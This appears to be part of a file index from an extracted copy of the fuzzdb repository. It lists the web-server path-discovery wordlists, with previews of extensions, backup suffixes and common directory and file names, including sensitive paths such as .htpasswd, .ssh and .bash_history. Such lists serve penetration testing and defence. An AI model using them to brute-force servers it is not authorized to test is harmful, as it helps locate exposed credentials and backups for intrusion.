"path": "discovery/predictable-filepaths/filename-dirname-bruteforce/CommonWebExtensions.txt",
"chars": 431,
"preview": ".asp\n.aspx\n.bat\n.c\n.cfm\n.cgi\n.com\n.dll\n.exe\n.htm\n.html\n.inc\n.jhtml\n.jsa\n.jsp\n.log\n.mdb\n.nsf\n.php\n.php2\n.php3\n.php4\n.php5"
},
{
"path": "discovery/predictable-filepaths/filename-dirname-bruteforce/Extensions.Backup.txt",
"chars": 61,
"preview": "backup\nbck\nold\nsave\nbak\nsav\n~\ncopy\norig\ntmp\ntxt\nback\nswp\nrej\n"
},
{
"path": "discovery/predictable-filepaths/filename-dirname-bruteforce/Extensions.Common.txt",
"chars": 3687,
"preview": "$er\n123\n1pe\n1ph\n3dr\n3dt\n3me\n3pe\n4dl\n4dv\n8xk\n^^^\na3l\na3m\na3w\na4l\na4m\na4w\na5l\na5w\na65\naao\nab\nab1\nab2\nab3\nabcd\nabi\nabp\naby\n"
},
{
"path": "discovery/predictable-filepaths/filename-dirname-bruteforce/Extensions.Compressed.txt",
"chars": 765,
"preview": "0\n000\n7z\na00\na01\na02\nace\nain\nalz\napz\nar\narc\narh\nari\narj\nark\naxx\nb64\nba\nbh\nboo\nbz\nbz2\nbzip\nbzip2\nc00\nc01\nc02\ncar\ncb7\ncbr\n"
},
{
"path": "discovery/predictable-filepaths/filename-dirname-bruteforce/Extensions.Mostcommon.txt",
"chars": 135,
"preview": "asp\naspx\nphp\nphp3\nphp4\nphp5\ntxt\nshtm\nshtml\nphtm\nphtml\njhtml\npl\njsp\ncfm\ncfml\npy\nrb\ncfg\nzip\npdf\ngz\ntar\ntar.gz\ntgz\ndoc\ndocx"
},
{
"path": "discovery/predictable-filepaths/filename-dirname-bruteforce/Extensions.Skipfish.txt",
"chars": 406,
"preview": "7z\nasmx\nasp\naspx\nbak\nbat\nbin\nbz2\nc\ncc\ncfg\ncfm\ncgi\nclass\ncnf\nconf\nconfig\ncpp\ncs\ncsv\ndat\ndb\ndll\ndo\ndoc\ndump\nep\nerr\nerror\ne"
},
{
"path": "discovery/predictable-filepaths/filename-dirname-bruteforce/WordlistSkipfish.txt",
"chars": 13086,
"preview": ".bash_history\n.bashrc\n.cvsignore\n.history\n.htaccess\n.htpasswd\n.passwd\n.perf\n.ssh\n.svn\n.web\n0\n00\n01\n02\n03\n04\n05\n06\n07\n08\n"
},
{
"path": "discovery/predictable-filepaths/filename-dirname-bruteforce/copy_of.txt",
"chars": 68,
"preview": "Copy_(1)_of_\nCopy_(2)_of_\nCopy%20of%20\nCopy_of_\nCopy_\nCopy%20\n_\n%20\n"
},
{
"path": "discovery/predictable-filepaths/filename-dirname-bruteforce/raft-large-directories-lowercase.txt",
"chars": 494030,
"preview": "cgi-bin\nimages\nadmin\nincludes\nmodules\ntemplates\ncache\nmedia\njs\nlanguage\ntmp\nsearch\nwp-content\nscripts\ncss\nplugins\nadmini"
},
{
"path": "discovery/predictable-filepaths/filename-dirname-bruteforce/raft-large-directories.txt",
"chars": 541817,
"preview": "cgi-bin\nimages\nadmin\nincludes\nmodules\ntemplates\ncache\nmedia\njs\nlanguage\ntmp\nsearch\nwp-content\nscripts\ncss\nplugins\nadmini"
},
{
"path": "discovery/predictable-filepaths/filename-dirname-bruteforce/raft-large-extensions-lowercase.txt",
"chars": 20230,
"preview": ".php\n.html\n.txt\n.htm\n.aspx\n.asp\n.js\n.css\n.pgsql.txt\n.mysql.txt\n.pdf\n.cgi\n.inc\n.gif\n.jpg\n.swf\n.xml\n.cfm\n.xhtml\n.wmv\n.zip\n"
},
{
"path": "discovery/predictable-filepaths/filename-dirname-bruteforce/raft-large-extensions.txt",
"chars": 20675,
"preview": ".php\n.html\n.txt\n.htm\n.aspx\n.asp\n.js\n.css\n.pgsql.txt\n.mysql.txt\n.pdf\n.cgi\n.inc\n.gif\n.jpg\n.swf\n.xml\n.cfm\n.xhtml\n.wmv\n.zip\n"
},
{
"path": "discovery/predictable-filepaths/filename-dirname-bruteforce/raft-large-files-lowercase.txt",
"chars": 470332,
"preview": "index.php\nsearch.php\ncron.php\nlogin.php\nxmlrpc.php\nlicense.txt\ninstall.php\nprofile.php\nmemberlist.php\nregister.php\nupdat"
},
{
"path": "discovery/predictable-filepaths/filename-dirname-bruteforce/raft-large-files.txt",
"chars": 493448,
"preview": "index.php\nsearch.php\ncron.php\nlogin.php\nxmlrpc.php\nLICENSE.txt\ninstall.php\nprofile.php\nmemberlist.php\nregister.php\nupdat"
},
{
"path": "discovery/predictable-filepaths/filename-dirname-bruteforce/raft-large-words-lowercase.txt",
"chars": 959425,
"preview": ".php\ncgi-bin\nimages\nadmin\nincludes\nsearch\n.html\ncache\nlogin\nmodules\ntemplates\nplugins\nwp-admin\nthemes\njs\nindex\nxmlrpc\nwp"
},
{
"path": "discovery/predictable-filepaths/filename-dirname-bruteforce/raft-large-words.txt",
"chars": 1053888,
"preview": ".php\ncgi-bin\nimages\nadmin\nincludes\nsearch\n.html\ncache\nlogin\nmodules\ntemplates\nplugins\nwp-admin\nthemes\njs\nindex\nxmlrpc\nwp"
},
{
"path": "discovery/predictable-filepaths/filename-dirname-bruteforce/raft-medium-directories-lowercase.txt",
"chars": 224469,
"preview": "cgi-bin\nimages\nadmin\nincludes\nmodules\ntemplates\ncache\nmedia\njs\nlanguage\ntmp\nsearch\nwp-content\nscripts\ncss\nplugins\nadmini"
},
{
"path": "discovery/predictable-filepaths/filename-dirname-bruteforce/raft-medium-directories.txt",
"chars": 250397,
"preview": "cgi-bin\nimages\nadmin\nincludes\nmodules\ntemplates\ncache\nmedia\njs\nlanguage\ntmp\nsearch\nwp-content\nscripts\ncss\nplugins\nadmini"
},
{
"path": "discovery/predictable-filepaths/filename-dirname-bruteforce/raft-medium-extensions-lowercase.txt",
"chars": 9574,
"preview": ".php\n.html\n.txt\n.htm\n.aspx\n.asp\n.js\n.css\n.pgsql.txt\n.mysql.txt\n.pdf\n.cgi\n.inc\n.gif\n.jpg\n.swf\n.xml\n.cfm\n.xhtml\n.wmv\n.zip\n"
},
{
"path": "discovery/predictable-filepaths/filename-dirname-bruteforce/raft-medium-extensions.txt",
"chars": 9873,
"preview": ".php\n.html\n.txt\n.htm\n.aspx\n.asp\n.js\n.css\n.pgsql.txt\n.mysql.txt\n.pdf\n.cgi\n.inc\n.gif\n.jpg\n.swf\n.xml\n.cfm\n.xhtml\n.wmv\n.zip\n"
},
{
"path": "discovery/predictable-filepaths/filename-dirname-bruteforce/raft-medium-files-lowercase.txt",
"chars": 212580,
"preview": "index.php\nsearch.php\ncron.php\nlogin.php\nxmlrpc.php\nlicense.txt\ninstall.php\nprofile.php\nmemberlist.php\nregister.php\nupdat"
},
{
"path": "discovery/predictable-filepaths/filename-dirname-bruteforce/raft-medium-files.txt",
"chars": 224363,
"preview": "index.php\nsearch.php\ncron.php\nlogin.php\nxmlrpc.php\nLICENSE.txt\ninstall.php\nprofile.php\nmemberlist.php\nregister.php\nupdat"
},
{
"path": "discovery/predictable-filepaths/filename-dirname-bruteforce/raft-medium-words-lowercase.txt",
"chars": 471037,
"preview": ".php\ncgi-bin\nimages\nadmin\nincludes\nsearch\n.html\ncache\nlogin\nmodules\ntemplates\nplugins\nwp-admin\nthemes\njs\nindex\nxmlrpc\nwp"
},
{
"path": "discovery/predictable-filepaths/filename-dirname-bruteforce/raft-medium-words.txt",
"chars": 524640,
"preview": ".php\ncgi-bin\nimages\nadmin\nincludes\nsearch\n.html\ncache\nlogin\nmodules\ntemplates\nplugins\nwp-admin\nthemes\njs\nindex\nxmlrpc\nwp"
},
{
"path": "discovery/predictable-filepaths/filename-dirname-bruteforce/raft-small-directories-lowercase.txt",
"chars": 145730,
"preview": "cgi-bin\nimages\nadmin\nincludes\nmodules\ntemplates\ncache\nmedia\njs\nlanguage\ntmp\nsearch\nwp-content\nscripts\ncss\nplugins\nadmini"
},
{
"path": "discovery/predictable-filepaths/filename-dirname-bruteforce/raft-small-directories.txt",
"chars": 163197,
"preview": "cgi-bin\nimages\nadmin\nincludes\nmodules\ntemplates\ncache\nmedia\njs\nlanguage\ntmp\nsearch\nwp-content\nscripts\ncss\nplugins\nadmini"
}
]
// ... and 175 more files (download for full content)
About this extraction
This page contains the full source code of the fuzzdb-project/fuzzdb GitHub repository, extracted and formatted as plain text for AI agents and large language models (LLMs). The extraction includes 375 files (15.5 MB), approximately 4.1M tokens, and a symbol index with 68 extracted functions, classes, methods, constants, and types. Use this with OpenClaw, Claude, ChatGPT, Cursor, Windsurf, or any other AI tool that accepts text input. You can copy the full output to your clipboard or download it as a .txt file.
Extracted by GitExtract — free GitHub repo to text converter for AI. Built by Nikandr Surkov.